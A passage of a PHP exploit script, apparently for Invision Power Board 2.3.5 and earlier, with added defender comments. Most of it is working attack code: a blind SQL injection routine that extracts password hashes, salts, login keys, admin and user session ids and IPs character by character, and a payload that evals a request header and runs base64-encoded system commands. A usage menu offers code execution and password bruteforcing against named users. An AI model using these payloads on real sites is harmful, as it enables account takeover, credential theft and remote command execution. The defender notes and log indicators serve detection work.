    # login_key. Returns key_val, which is set elsewhere.
    # Defender note: member login keys belong on the list of values to
    # rotate after a suspected compromise.
    function get_login_key&#40;&#41;
    {
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_key             = &#39;login_key&#39;;
            $this-&gt;t_table           = &#39;members&#39;;
            $this-&gt;t_field           = &#39;t.member_login_key&#39;;
            $this-&gt;t_join            = &#39;t.id=m.id&#39;;
            $this-&gt;t_char            = $this-&gt;chr_md5;
            $this-&gt;data[&#39;login_key&#39;] = $this-&gt;bf_inj&#40;&#41;;
            
            return $this-&gt;key_val;
    }
    
    # Points bf_inj, defined outside this excerpt, at the result of the SQL
    # user function, with the at sign set as the end marker in t_end, and
    # stores the result in data under sql_user. Returns key_val, which is
    # set elsewhere.
    function get_sql_user&#40;&#41;
    {
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_key             = &#39;user&#40;&#41;&#39;;
            $this-&gt;t_table           = &#39;members&#39;;
            $this-&gt;t_field           = &#39;user&#40;&#41;&#39;;
            $this-&gt;t_char            = $this-&gt;chr_all;
            $this-&gt;t_end             = &#39;@&#39;;
            $this-&gt;data[&#39;sql_user&#39;]  = $this-&gt;bf_inj&#40;&#41;;
            
            return $this-&gt;key_val;
    }
    
    # Points bf_inj, defined outside this excerpt, at the converge_pass_hash
    # column of the members_converge table, joined to the member by email,
    # and stores the result in data under pass_hash. Returns key_val, which
    # is set elsewhere.
    # Defender note: this is the stored password hash that bf_usr_pwd tests
    # offline, so affected members need a password reset.
    function get_pass_hash&#40;&#41;
    {
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_key             = &#39;pass_hash&#39;;
            $this-&gt;t_table           = &#39;members_converge&#39;;
            $this-&gt;t_field           = &#39;t.converge_pass_hash&#39;;
            $this-&gt;t_join            = &#39;t.converge_email=m.email&#39;;
            $this-&gt;t_char            = $this-&gt;chr_md5;
            $this-&gt;data[&#39;pass_hash&#39;] = $this-&gt;bf_inj&#40;&#41;;
            
            return $this-&gt;key_val;
    }
    
    # Points bf_inj, defined outside this excerpt, at the converge_pass_salt
    # column of the members_converge table, joined to the member by email,
    # and stores the result in data under pass_salt. Returns key_val, which
    # is set elsewhere.
    function get_pass_salt&#40;&#41;
    {       
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_key             = &#39;pass_salt&#39;;
            $this-&gt;t_table           = &#39;members_converge&#39;;
            $this-&gt;t_field           = &#39;t.converge_pass_salt&#39;;
            $this-&gt;t_join            = &#39;t.converge_email=m.email&#39;;
            $this-&gt;t_char            = $this-&gt;chr_all;
            $this-&gt;data[&#39;pass_salt&#39;] = $this-&gt;bf_inj&#40;&#41;;
            
            return $this-&gt;key_val;
    }
    
    # Points bf_inj, defined outside this excerpt, at the session_id column
    # of the admin_sessions table, joined on session_member_id, with
    # session_log_in_time in t_sel, and stores the result in data under
    # a_sess_id. Returns key_val, which is set elsewhere. How bf_inj uses
    # t_sel is not visible here.
    # Defender note: clearing the admin_sessions table invalidates any admin
    # session id that has been read this way.
    function get_admin_sess&#40;&#41;
    {
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_key             = &#39;admin_sid&#39;;
            $this-&gt;t_table           = &#39;admin_sessions&#39;;
            $this-&gt;t_field           = &#39;t.session_id&#39;;
            $this-&gt;t_join            = &#39;t.session_member_id=m.id&#39;;
            $this-&gt;t_sel             = &#39;t.session_log_in_time&#39;;
            $this-&gt;t_char            = $this-&gt;chr_md5;
            $this-&gt;data[&#39;a_sess_id&#39;] = $this-&gt;bf_inj&#40;&#41;;
            
            return $this-&gt;key_val;
    }
    
    # Points bf_inj, defined outside this excerpt, at the session_ip_address
    # column of the admin_sessions table, joined on session_member_id, and
    # stores the result in data under a_ip_addr. Returns key_val, which is
    # set elsewhere.
    function get_admin_ip&#40;&#41;
    {
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_key             = &#39;admin_ip&#39;;
            $this-&gt;t_table           = &#39;admin_sessions&#39;;
            $this-&gt;t_field           = &#39;t.session_ip_address&#39;;
            $this-&gt;t_join            = &#39;t.session_member_id=m.id&#39;;
            $this-&gt;t_sel             = &#39;t.session_log_in_time&#39;;
            $this-&gt;t_char            = $this-&gt;chr_ip;
            $this-&gt;data[&#39;a_ip_addr&#39;] = $this-&gt;bf_inj&#40;&#41;;
            
            return $this-&gt;key_val;
    }
    
    # Points bf_inj, defined outside this excerpt, at the admin_post_details
    # column of the admin_login_logs table, joined on the admin username,
    # with a double quote as end marker and t_bchar set to -4, and stores
    # the result in data under a_pwd_like. Returns key_val, which is set
    # elsewhere. Nothing in this excerpt calls this method.
    # NOTE(review): the data key suggests the author expects password-like
    # material in admin_post_details; confirm what the board logs there and
    # purge or restrict that table if it holds submitted credentials.
    function get_admin_pwd&#40;&#41;
    {
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_key             = &#39;admin_pwd&#39;;
            $this-&gt;t_table           = &#39;admin_login_logs&#39;;
            $this-&gt;t_field           = &#39;t.admin_post_details&#39;;
            $this-&gt;t_join            = &#39;t.admin_username=m.members_l_username&#39;;
            $this-&gt;t_sel             = &#39;t.admin_id&#39;;
            $this-&gt;t_end             = &#39;&quot;&#39;;
            $this-&gt;t_bchar           = -4; # &quot;;}}
            $this-&gt;t_char            = $this-&gt;chr_all;
            $this-&gt;data[&#39;a_pwd_like&#39;]= $this-&gt;bf_inj&#40;&#41;;
            
            return $this-&gt;key_val;
    }
    
    # Sets up an extraction run for t.id in the sessions table, joined to the
    # members table on member_id, with candidates limited to digits and a-f.
    # The recovered value is stored in data under u_sess_id and returned.
    # Defender note: as with admin sessions, a stored session id that an
    # injection can read is equivalent to a live credential.
    function get_user_sess&#40;&#41;
    {
            # Reset the query template fields left over from a previous run
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_key             = &#39;user_sid&#39;;
            $this-&gt;t_table           = &#39;sessions&#39;;
            $this-&gt;t_field           = &#39;t.id&#39;;
            $this-&gt;t_join            = &#39;t.member_id=m.id&#39;;
            $this-&gt;t_sel             = &#39;t.running_time&#39;;
            $this-&gt;t_char            = $this-&gt;chr_md5;
            $this-&gt;data[&#39;u_sess_id&#39;] = $this-&gt;bf_inj&#40;&#41;;
            
            return $this-&gt;key_val;
    }
    
    # Sets up an extraction run for t.ip_address in the sessions table,
    # joined to the members table, with candidates limited to digits and dot.
    # The recovered value is stored in data under u_ip_addr and returned.
    # Defender note: the address sits in the same row as the session id, so
    # an address check on the session does not protect it once the table is
    # readable.
    function get_user_ip&#40;&#41;
    {
            # Reset the query template fields left over from a previous run
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_key             = &#39;user_ip&#39;;
            $this-&gt;t_table           = &#39;sessions&#39;;
            $this-&gt;t_field           = &#39;t.ip_address&#39;;
            $this-&gt;t_join            = &#39;t.member_id=m.id&#39;;
            $this-&gt;t_sel             = &#39;t.running_time&#39;;
            $this-&gt;t_char            = $this-&gt;chr_ip;
            $this-&gt;data[&#39;u_ip_addr&#39;] = $this-&gt;bf_inj&#40;&#41;;
            
            return $this-&gt;key_val;
    }
    
    # Sets up an extraction run for t.browser in the sessions table, joined
    # to the members table, using the full character set.
    # The recovered value is stored in data under u_agent and returned.
    # Defender note: the User-Agent recorded for a session is stored beside
    # the session id, so a User-Agent match is not an independent check.
    function get_user_agent&#40;&#41;
    {
            # Reset the query template fields left over from a previous run
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_key             = &#39;user_agent&#39;;
            $this-&gt;t_table           = &#39;sessions&#39;;
            $this-&gt;t_field           = &#39;t.browser&#39;;
            $this-&gt;t_join            = &#39;t.member_id=m.id&#39;;
            $this-&gt;t_sel             = &#39;t.running_time&#39;;
            $this-&gt;t_char            = $this-&gt;chr_all;
            $this-&gt;data[&#39;u_agent&#39;]   = $this-&gt;bf_inj&#40;&#41;;
            
            return $this-&gt;key_val;
    }
    
    # Resets the per-run query template fields to their defaults so that one
    # extraction run does not inherit settings from the previous one.
    # Returns nothing.
    function init_sql&#40;&#41;
    {
            # SQL Injection params
            $this-&gt;t_end   = null;
            $this-&gt;t_add_0 = &#39;&#39;;
            $this-&gt;t_add_1 = &#39;&#39;;
            $this-&gt;t_sel   = &#39;1&#39;;
            $this-&gt;t_bchar = 0;
            $this-&gt;t_join  = &#39;&#39;;
            $this-&gt;t_key   = &#39;&#39;;
            # t_add_1 is assigned a second time here; this later value is the
            # one in effect after the reset
            $this-&gt;t_add_1 = &#39;ORDER BY id DESC LIMIT 1&#39;;
            
            return;
    }
    
    # Fills in the constants the rest of the class reads: candidate character
    # sets, the request and query templates, result containers, the payload
    # strings, the response-parsing patterns and the default client headers.
    # Returns nothing.
    #
    # Indicators a defender can take from these values:
    # - requests to index.php with act=xmlout and do=check-display-name whose
    #   name parameter carries SQL keywords;
    # - a request header that PHP exposes as HTTP_MY_CODE;
    # - stored content containing the text assigned to php_write below;
    # - the literal User-Agent value Mozilla Firefox, which no real browser
    #   sends in that form.
    function init_global&#40;&#41;
    {
            # Charsets
            # NOTE(review): several characters in the next list look
            # mis-encoded on this page; the literal is left exactly as found
            $this-&gt;chr_spe = str_split&#40;&#39; :/;*&#40;-.!,?§*µщ&#37;$Ј^Ё=+}&#41;°]аз^_&#92;&#92;&#96;и|[&#92;&#39;{#й~&amp;І&quot;@&#39;&#41;;
            $this-&gt;chr_num = range&#40;0, 9&#41;;
            $this-&gt;chr_md5 = array_merge&#40; $this-&gt;chr_num, range&#40;&#39;a&#39;, &#39;f&#39;&#41; &#41;;
            $this-&gt;chr_ip  = array_merge&#40; $this-&gt;chr_num, array&#40;&#39;.&#39;&#41; &#41;;
            $this-&gt;chr_all = array_merge&#40; $this-&gt;chr_num, range&#40;&#39;a&#39;, &#39;z&#39;&#41; &#41;;
            $this-&gt;chr_all = array_merge&#40; range&#40;&#39;A&#39;, &#39;Z&#39;&#41;, $this-&gt;chr_all, $this-&gt;chr_spe &#41;;

            # SQL Injection
            # def_param is the request path with a placeholder for the
            # injected value; def_inj is the value template with placeholders
            # for the sub-query and the trailing clause
            $this-&gt;def_param = &#39;index.php?s=&amp;act=xmlout&amp;do=check-display-name&amp;name=&#37;rep_inj&#37;&#39;;
            $this-&gt;def_inj   = &quot;&#39; OR 1=&#92;&quot;&#39;&#92;&quot; UNION &#37;rep_req&#37; OR 1=&#92;&quot;&#39;&#92;&quot; &#37;rep_add&#37; #&quot;;
            
            # Results
            $this-&gt;data = array&#40;&#41;;
            $this-&gt;conf = array&#40;&#39;ip&#39; =&gt; &#39;&#39;, &#39;browser&#39; =&gt; &#39;&#39;, &#39;xforward&#39; =&gt; &#39;&#39;&#41;;
            
            # Misc
            # stat maps the status numbers passed to msg to a one-character
            # prefix; res_sep is a random marker printed around command
            # output; def_ip is a random dotted quad
            $this-&gt;stat     = array&#40;-1 =&gt; &#39;-&#39;, 0 =&gt; &#39;/&#39;, 1 =&gt; &#39;+&#39;&#41;;
            $this-&gt;s_bypass = false;
            $this-&gt;res_sep  = md5&#40;rand&#40;&#41;&#41;;
            $this-&gt;def_ip   = rand&#40;0,255&#41;.&#39;.&#39;.rand&#40;0,255&#41;.&#39;.&#39;.rand&#40;0,255&#41;.&#39;.&#39;.rand&#40;0,255&#41;;
            
            # PHP Code
            # php_write evaluates whatever arrives in one request header;
            # php_send is the template for that header value. Both are used
            # by code outside this excerpt.
            $this-&gt;php_write = &#39;${${@eval&#40;$_SERVER[HTTP_MY_CODE]&#41;}}&#39;;
            $this-&gt;php_send  = &quot;print&#40;&#39;$this-&gt;res_sep&#39;&#41;;@system&#40;base64_decode&#40;&#39;&#37;CMD&#37;&#39;&#41;&#41;;&quot;;
            $this-&gt;php_send .= &quot;print&#40;&#39;$this-&gt;res_sep&#39;&#41;;exit&#40;0&#41;;&quot;;
            
            # Regex
            # Patterns applied to server responses by code outside this excerpt
            $this-&gt;reg_lang = &#39;#&lt;/span&gt;&lt;/td&gt;[&#92;r&#92;n]*.*[&#92;r&#92;n]*.*code=export&amp;id=&#40;[0-9]+&#41;#i&#39;;
            $this-&gt;reg_lvar = &quot;#id=&#39;XX_&#40;[&#92;w]+&#41;&#39;[&#92;x20]+class=&#39;multitext&#39;&gt;&#40;.*&#41;&lt;/textarea&gt;&lt;/td&gt;#i&quot;;
            $this-&gt;reg_cpre = &#39;#^&#40;.*&#41;session_id$#&#39;;
            # $this-&gt;reg_acp  = &#39;#&lt;a href=&quot;&#40;.*&#41;&quot;[&#92;x20]+target=&quot;_blank&quot;#i&#39;;
            
            # Default client headers
            $this-&gt;s_agent = &#39;Mozilla Firefox&#39;;
            $this-&gt;s_ip    = $this-&gt;def_ip;
            
            return;
    }
    
    # Recovers one string from the database one character at a time, using
    # the fields set by the calling get_ helper: t_table, t_field, t_char,
    # t_end, t_bchar, t_join, t_sel, t_add_0 and t_add_1.
    # For each position it asks the server, once per candidate character,
    # whether the character code at that position of the field equals the
    # candidate, and treats a response without the text notfound as a yes.
    # Returns the recovered string, reversed when reading ran backwards.
    #
    # Defender notes, all read off this code:
    # - The injection point is the name parameter of the check-display-name
    #   request built from def_param. The query text is plain string
    #   concatenation and the quotes are sent double URL-encoded; the source
    #   comment below attributes the flaw to rawurldecode. The fix is on the
    #   server: upgrade past the versions named in the page title, apply
    #   escaping after the last decode step, and bind parameters.
    # - One recovered character costs up to count of t_char plus one GET
    #   requests that differ only in a position and a number, so a run shows
    #   in access logs as a dense burst against one endpoint containing
    #   UNION, ASCII, SUBSTR, %2522 or %2527.
    function bf_inj&#40;&#41;
    {
            $this-&gt;sub_chr = $this-&gt;t_bchar;
            $this-&gt;key_val = &#39;&#39;;
                    
            if&#40; !empty&#40;$this-&gt;t_key&#41; &#41;
            $this-&gt;msg&#40;&#39;&#39;, 0&#41;;
            
            # One pass of this loop per character position
            while&#40; true &#41;
            {
                    # The sign of t_bchar picks the reading direction
                    if&#40; $this-&gt;t_bchar &lt; 0 &#41;
                    $this-&gt;sub_chr--;
                    
                    else
                    $this-&gt;sub_chr++;
    
                    # 0-9a-f
                    # The loop runs one step past the end of t_char; that
                    # extra step is the stop character t_end
                    for&#40; $j=0;$j&lt;=count&#40;$this-&gt;t_char&#41;;$j++ &#41;
                    {
                            # That one ?
                            $chr = $this-&gt;t_char[$j];
                            
                            # Latest char ?
                            if&#40; $j === count&#40;$this-&gt;t_char&#41; &#41;
                            $chr = $this-&gt;t_end;
                            
                            # Ascii num
                            $asc = ord&#40;$chr&#41;;
                            
                            # Screen bug
                            # Progress line, redrawn in place for each candidate
                            if&#40; !empty&#40;$this-&gt;t_key&#41; &#41; 
                            {
                                    $msg  = $this-&gt;t_key.&#39;=&#39;.$this-&gt;key_val;
                                    $msg .= &#40;$chr === $this-&gt;t_end ? &quot;&#92;x20&quot; : $chr&#41;;
                                    
                                    $this-&gt;msg&#40;$msg, 0, 1, 1&#41;;
                            }
                            
                            # Focus on the target ?
                            # With a join condition the row is restricted to
                            # one member through t_on, which is set outside
                            # this excerpt
                            if&#40; !empty&#40;$this-&gt;t_join&#41; &#41;
                            {
                                    $inj = 
                                    &#39;SELECT 1,&#39;.$this-&gt;t_sel.&#39; FROM &#39;.$this-&gt;p_pre.$this-&gt;t_table.
                                    &#39; t, &#39;.$this-&gt;p_pre.&#39;members m WHERE &#39;.$this-&gt;t_join.
                                    &#39; AND m.&#39;.$this-&gt;t_on.&#39; AND ASCII&#40;SUBSTR&#40;&#39;.$this-&gt;t_field.
                                    &#39;,&#39;.$this-&gt;sub_chr.&#39;,1&#41;&#41;=&#39;.$asc.&#39; &#39;.$this-&gt;t_add_0;
                            }
                            else 
                            {
                                    $inj =
                                    &#39;SELECT 1,&#39;.$this-&gt;t_sel.&#39; FROM &#39;.$this-&gt;p_pre.$this-&gt;t_table.
                                    &#39; t WHERE ASCII&#40;SUBSTR&#40;&#39;.$this-&gt;t_field.&#39;,&#39;.$this-&gt;sub_chr.
                                    &#39;,1&#41;&#41;=&#39;.$asc.&#39; &#39;.$this-&gt;t_add_0;
                            }

                            # SQL Injection via rawurldecode&#40;&#41;
                            # Quotes go out double URL-encoded, so a filter
                            # that decodes the value once still sees an
                            # encoded quote
                            $inj = str_replace&#40;&#39;&#37;rep_req&#37;&#39;, $inj, $this-&gt;def_inj&#41;;
                            $inj = str_replace&#40;&#39;&#37;rep_add&#37;&#39;, $this-&gt;t_add_1, $inj&#41;;
                            $inj = str_replace&#40;array&#40;&#39;&quot;&#39;, &quot;&#39;&quot;&#41;, array&#40;&#39;&#37;2522&#39;, &#39;&#37;2527&#39;&#41;, $inj&#41;;
                            
                            # Params
                            $inj = str_replace&#40;&#39;&#37;rep_inj&#37;&#39;, $inj, $this-&gt;def_param&#41;;
                            $inj = str_replace&#40;array&#40;&#39; &#39;, &#39;#&#39;&#41;, array&#40;&#39;&#37;20&#39;, &#39;&#37;23&#39;&#41;, $inj&#41;;
                            
                            $this-&gt;web-&gt;get&#40;$this-&gt;p_url.$inj&#41;;

                            # Ok !?
                            # The only signal read from the response is
                            # whether the text notfound is present
                            if&#40; !strstr&#40;$this-&gt;web-&gt;getcontent&#40;&#41;, &#39;notfound&#39;&#41; &#41;
                            {
                                    if&#40; $chr !== $this-&gt;t_end &#41;
                                    {       
                                            $this-&gt;key_val .= $chr;
                                            break;
                                    }
                            }
                            
                            # End
                            # Reaching the stop character ends the run
                            # whatever the response to that request was
                            if&#40; $chr === $this-&gt;t_end &#41;
                            {
                                    # Reverse
                                    if&#40; $this-&gt;t_bchar &lt; 0 &#41;
                                    $this-&gt;key_val = strrev&#40;$this-&gt;key_val&#41;;
                                    
                                    if&#40; !empty&#40;$this-&gt;t_key&#41; &#41; 
                                    $this-&gt;msg&#40;$this-&gt;t_key.&#39;=&#39;.$this-&gt;key_val, 1, 1, 1&#41;;

                                    return $this-&gt;key_val;
                            }
                    }
            }
            
    }
            
    # Looks up a command-line option in the global argv array.
    # p is the option name without its leading dash.
    # Returns the argument that follows the option when it is set and not
    # empty, true when the option is present without a usable value, and
    # false when the option is absent. When exit is true, a missing option
    # or missing value calls usage, which ends the script.
    function get_p&#40;$p, $exit=false&#41;
    {
            global $argv;
            
            foreach&#40; $argv as $key =&gt; $value &#41;
            {
                    if&#40; $value === &#39;-&#39;.$p &#41;
                    {
                            # empty also rejects the string 0, so a value of
                            # 0 is treated like a missing value
                            if&#40; isset&#40;$argv[$key+1]&#41; &amp;&amp; !empty&#40;$argv[$key+1]&#41; &#41;
                            {                                       
                                    return $argv[$key+1];
                            }
                            else
                            {
                                    if&#40; $exit &#41;
                                    $this-&gt;usage&#40;&#41;;
                                    
                                    return true;
                            }
                    }
            }
            
            if&#40; $exit &#41;
            $this-&gt;usage&#40;&#41;;
            
            return false;
    }
    
    # Prints one status line to standard output.
    # msg is the text, nstatus a key of the stat map that selects the prefix
    # character, nspace the number of leading spaces, ndel chooses a carriage
    # return instead of a newline so the line is redrawn in place.
    # When ask is true, one line is read from standard input and returned
    # trimmed; otherwise nothing is returned.
    function msg&#40;$msg, $nstatus, $nspace=1, $ndel=0, $ask=false&#41;
    {
            if&#40; $ndel &#41; $type = &quot;&#92;r&quot;;
            else        $type = &quot;&#92;n&quot;;
            
            # wtf &#40;:
            print
            &#40;
                    $type.str_repeat&#40;&quot;&#92;x20&quot;, $nspace&#41;.
                    $this-&gt;stat[$nstatus].&quot;&#92;x20&quot;.$msg
            &#41;;
            
            if&#40; $ask &#41;
            return trim&#40;fgets&#40;STDIN&#41;&#41;;
    }
    
    # Prints a failure notice with the minus status prefix and ends the
    # script with exit status 1.
    function give_hope&#40;&#41;
    {                               
            $this-&gt;msg&#40;&#39;You should try with another user or try another time&#39;, -1&#41;;
                    
            exit&#40;1&#41;;
    }
    
    # Prints the banner: affected product and version range, author contact
    # and the heading for the list of modes. Returns nothing.
    function mhead&#40;&#41;
    {
            # Advisory: http://acid-root.new.fr/?0:18
            
            print &quot;&#92;n Invision Power Board &lt;= 2.3.5 Multiple Vulnerabilities&quot;;
            print &quot;&#92;n ------------------------------------------------------&quot;;
            print &quot;&#92;n&#92;n About:&quot;;
            print &quot;&#92;n&#92;n by DarkFig &lt; gmdarkfig &#40;at&#41; gmail &#40;dot&#41; com &gt;&quot;;
            print &quot;&#92;n http://acid-root.new.fr/&quot;;
            print &quot;&#92;n #[email protected]&quot;;
            print &quot;&#92;n&#92;n&#92;n Attack&#40;s&#41;:&#92;n&quot;;
            
            return;
    }
    
    # Prints the command-line help for the three modes and the proxy options,
    # then ends the script with exit status 1. The option names listed here
    # are the ones get_p looks up in argv.
    function usage&#40;&#41;
    {

            print &quot;&#92;n -attack &lt;int_choice&gt; &lt;params&gt; [options]&#92;n&#92;n&quot;;
            print &quot;  1 - PHP code execution&#92;n&#92;n&quot;;
            print &quot;    -url        IPB url with ending slash&#92;n&#92;n&quot;;
            print &quot;    -uname      targeted username&#92;n&quot;;
            print &quot;    -uid        OR the targeted user id &#40;def: 1&#41;&#92;n&#92;n&quot;;
            print &quot;    -prefix     sql table prefix &#40;def: ibf_&#41;&#92;n&quot;;
            print &quot;    -acp        admin control panel path &#40;def: admin&#41;&#92;n&#92;n&#92;n&quot;;
            print &quot;  2 - Insecure SQL password usage&#92;n&#92;n&quot;;
            print &quot;    -ip         your current IP&#92;n&quot;;
            print &quot;    -dict       a wordlist file&#92;n&#92;n&quot;;
            print &quot;    -url        IPB url with ending slash&#92;n&quot;;
            print &quot;    -uname      a valid member username&#92;n&quot;;
            print &quot;    -pwd        the associated password&#92;n&#92;n&quot;;
            print &quot;    -uid        OR  the targeted member id&#92;n&quot;;
            print &quot;    -passhash   the passhash cookie value&#92;n&quot;;
            print &quot;    -stronghold the stronghold cookie value&#92;n&#92;n&quot;;
            print &quot;    -sqlusr     you can precise the sql user&#92;n&quot;;
            print &quot;    -prefix     sql table prefix &#40;def: ibf_&#41;&#92;n&#92;n&#92;n&quot;;
            print &quot;  3 - Password bruteforcer&#92;n&#92;n&quot;;
            print &quot;    -dict       a wordlist file&#92;n&#92;n&quot;;
            print &quot;    -url        IPB url with ending slash&#92;n&quot;;
            print &quot;    -uname      targeted username&#92;n&quot;;
            print &quot;    -uid        OR  the targeted user id &#40;def: 1&#41;&#92;n&quot;;
            print &quot;    -prefix     sql table prefix &#40;def: ibf_&#41;&#92;n&#92;n&quot;;
            print &quot;    -passhash   OR the passhash value&#92;n&quot;;
            print &quot;    -salt       the salt value&#92;n&#92;n&#92;n&quot;;
            print &quot;  Optional: &#92;n&#92;n&quot;;
            print &quot;    -proxhost &lt;ip&gt;       if you wanna use a proxy&#92;n&quot;;
            print &quot;    -proxauth &lt;usr:pwd&gt;  proxy with authentication&#92;n&quot;;
            
            exit&#40;1&#41;;
    }

}

# Script entry: create the HTTP client from the required phpsploit class,
# hand it to the ipb_spl instance by reference and run main, which
# dispatches on the -attack argument.
# cookiejar 1 presumably turns on cookie persistence between requests;
# the phpsploit class is not part of this file.
# The fixed User-Agent value set here is not a real browser string, so it
# is a usable access-log indicator for unmodified copies of this script.
$web = new phpsploit;
$web->cookiejar(1);
$web->agent('Mozilla Firefox');

$ipb = new ipb_spl;
$ipb->web =& $web;
$ipb->main();

?>